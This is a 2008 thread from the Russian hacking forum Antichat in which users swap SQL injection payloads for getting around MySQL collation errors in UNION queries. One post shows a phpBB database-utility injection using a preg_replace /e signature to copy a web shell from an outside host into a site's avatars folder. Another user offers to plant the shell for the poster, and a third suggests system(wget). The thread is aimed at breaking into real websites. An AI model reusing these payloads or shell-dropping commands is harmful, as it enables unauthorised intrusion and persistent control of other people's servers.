ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3821  
Старый 25.11.2008, 05:33
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Цитата:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Здесь проблема в кодировке, или в отстутсвии оператора UNION?
 
Ответить с цитированием

  #3822  
Старый 25.11.2008, 05:37
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

В кодировке. Пробуй convert(concat(version())+using+latin1)
 
Ответить с цитированием

  #3823  
Старый 25.11.2008, 05:45
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

union+select+1,unhex(hex(version())),3/*
 
Ответить с цитированием

  #3824  
Старый 25.11.2008, 05:50
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

convert(version(),binary)
AES_DECRYPT(AES_ENCRYPT(CONCAT(version()),0x71),0x 71)
...
Давай все поперечисляем?
 
Ответить с цитированием

  #3825  
Старый 25.11.2008, 05:57
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Действительно, в кодировке.
Спасибо
 
Ответить с цитированием

  #3826  
Старый 25.11.2008, 06:41
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

хм... вот такая вот ошибочка когда пытаюсь залить код с copy:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx/httpdocs/f' at line 1

UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='forum:copy('http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx.ru/httpdocs/forum/avatars/shall.txt')' WHERE user_id=2

Line : 980
File : admin_db_utilities.php


Подумал можт дело в '' убрал их... залилось но выдает пустую страничку (((((
 
Ответить с цитированием

  #3827  
Старый 25.11.2008, 07:28
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Ghost0ff
в пхпбб какой версии пытаешся залить шелл? кинь данные в пм зделаю)
 
Ответить с цитированием

  #3828  
Старый 25.11.2008, 07:38
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Ясен пень, что дело в кавычках. Внутренние апострофы экранировать надо.
 
Ответить с цитированием

  #3829  
Старый 25.11.2008, 10:51
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

Цитата:
Сообщение от krypt3r  
Ясен пень, что дело в кавычках. Внутренние апострофы экранировать надо.
хм... это как? оО кинь ссылко на источник или объясни плз
 
Ответить с цитированием

  #3830  
Старый 25.11.2008, 10:54
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

а что system(wget get и т.д) уже не в моде? или отключён? Лишний гемор всё это...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ